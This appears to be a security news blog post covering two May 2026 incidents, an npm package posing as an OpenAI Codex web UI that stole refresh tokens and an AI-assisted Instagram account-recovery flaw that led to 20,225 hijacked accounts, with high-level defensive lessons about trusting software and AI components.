Codex UI steals tokens, Meta AI Instagram accounts hijacked

Two supply-chain stories landed in the same 48 hours. Aikido Security disclosed that the npm package codexui-android — a remote web UI for OpenAI Codex with roughly 27,000 weekly downloads — had been silently exfiltrating OpenAI refresh tokens to attacker-controlled servers for a month. Then Meta confirmed that a flaw in its AI-assisted Instagram account recovery system ("High Touch Support") let attackers hijack 20,225 Instagram accounts and exfiltrate contact info, dates of birth, and linked social handles.

What You Need to Know: An npm package with 27,000 weekly downloads exfiltrated OpenAI Codex refresh tokens for a month, and a separate bug in Meta's AI support tool let attackers hijack 20,225 Instagram accounts in late May 2026. The AI supply chain and the AI-assisted support chain are both live attack surfaces.

Why It Matters

• A "legitimate-looking" tool with 27K weekly downloads was a token stealer. codexui-android had a real GitHub repo, active development, and a polished UI. It was also phoning home every Codex auth token it could grab. If your security model is "check the README, see activity, install," it failed here.
• Meta's AI support tool got hijacked, then used to hijack 20,225 accounts. The High Touch Support (HTS) flaw was discovered on May 31, 2026, and the attackers had already been active. Black-market Telegram groups immediately started advertising "Instagram account takeover" services using it.
• AI agents are now first-class corporate support tools — and corporate attack surfaces. When Meta put an AI in the account-recovery loop, it trusted the model to verify identity. Attackers bypassed that by impersonating the support tool itself.
• The CVSS numbers aren't theoretical. LiteLLM was 9.3, Langflow was unauthenticated RCE, and now we have 20K+ real accounts taken over. The defenders lost ground in May.

What Actually Happened

Aikido Security catches codexui-android stealing OpenAI tokens

On May 27, 2026, Aikido Security published a full disclosure of codexui-android, a malicious npm package posing as a remote web UI for OpenAI Codex. The package had a real GitHub repository, frequent commits, and roughly 27,000 weekly downloads at peak — and it was silently exfiltrating OpenAI auth tokens to an external server every time a developer used it.

Aikido's follow-up post on X summarized the threat: "For the past month, codexui-android, an npm package with 27K weekly downloads, has been silently exfiltrating OpenAI Codex auth tokens on install." Hackread's reporting put the impact bluntly: 27,000 weekly downloads means a non-trivial number of OpenAI Codex users had their accounts — and the credentials behind them — exposed.

The package has been removed from npm, but the playbook is now proven. Expect copycats.

Meta's High Touch Support vulnerability hit 20,225 Instagram accounts

On May 31, 2026, Meta discovered a vulnerability in an AI-assisted account recovery system for Instagram called "High Touch Support" (HTS). BleepingComputer's report confirmed: "Meta has revealed that 20,225 Instagram users had their accounts hijacked in a recent incident where attackers used Meta's AI-powered support" tool to impersonate account owners.

The exposed data per affected user included contact information, date of birth, and linked social media handles. Cybernews called it "Meta bug exposed 20K Instagram accounts", noting the AI-assisted recovery flow was the attack vector. Researchers at Sid's Blog put the social context: "Multiple black market Telegram groups have sprung up offering 'account takeover' services at steep rates and quick turnaround times" using the same flaw.

The post-mortem from Meta acknowledges the gap. The fix involves gating HTS with stricter identity verification and reducing the AI agent's authority to issue recovery actions.

Why both stories matter together

Both bugs share a single root cause: trusting a software component that looked legitimate. In the npm case, the package had a real repo, real commits, and 27,000 users validating it. In the Meta case, the AI support tool was an internal Meta component trusted by recovery flows. In both, attackers exploited the trust, not a novel cryptographic break.

The pattern is: as soon as an AI component gets production authority, it gets the same threat model as a database admin or a CI pipeline maintainer. That means the same hardening: least-privilege credentials, signed artifacts, behavioral anomaly detection, and human-in-the-loop for high-stakes actions.

The Take

The Codex UI story should be a 2026 wake-up call for the npm-as-infrastructure assumption. "27K weekly downloads" was the camouflage — the attackers knew that download count would make the package look safer. The lesson: download count is a signal attackers can fake, not a trust indicator.

The Meta story is a different kind of brutal. The whole point of putting AI in support is to scale identity verification. When the AI tool itself gets hijacked, you've centralized the attack surface in a way that humans working in shifts never were. Expect every company with an AI-assisted support or recovery flow to revisit their threat model this quarter.

Quick Summary

An npm package with 27K weekly downloads was a token-stealer for a month. Meta's AI-powered Instagram recovery tool was used to hijack 20,225 accounts. Both bugs attacked trust, not cryptography — the same lesson, twice in 48 hours.

Sources

• Legitimate-Looking Codex Remote UI Secretly Steals Your AI Tokens — Aikido Security
• 27,000-Download Codex UI Tool Secretly Stole OpenAI Refresh Tokens — Hackread
• Meta AI Support Data Breach Affects 20,000 Instagram Accounts — BleepingComputer
• Meta bug exposed 20K Instagram accounts — Cybernews
• The Newest Instagram "Exploit" is the Goofiest I've Seen — Sid's Blog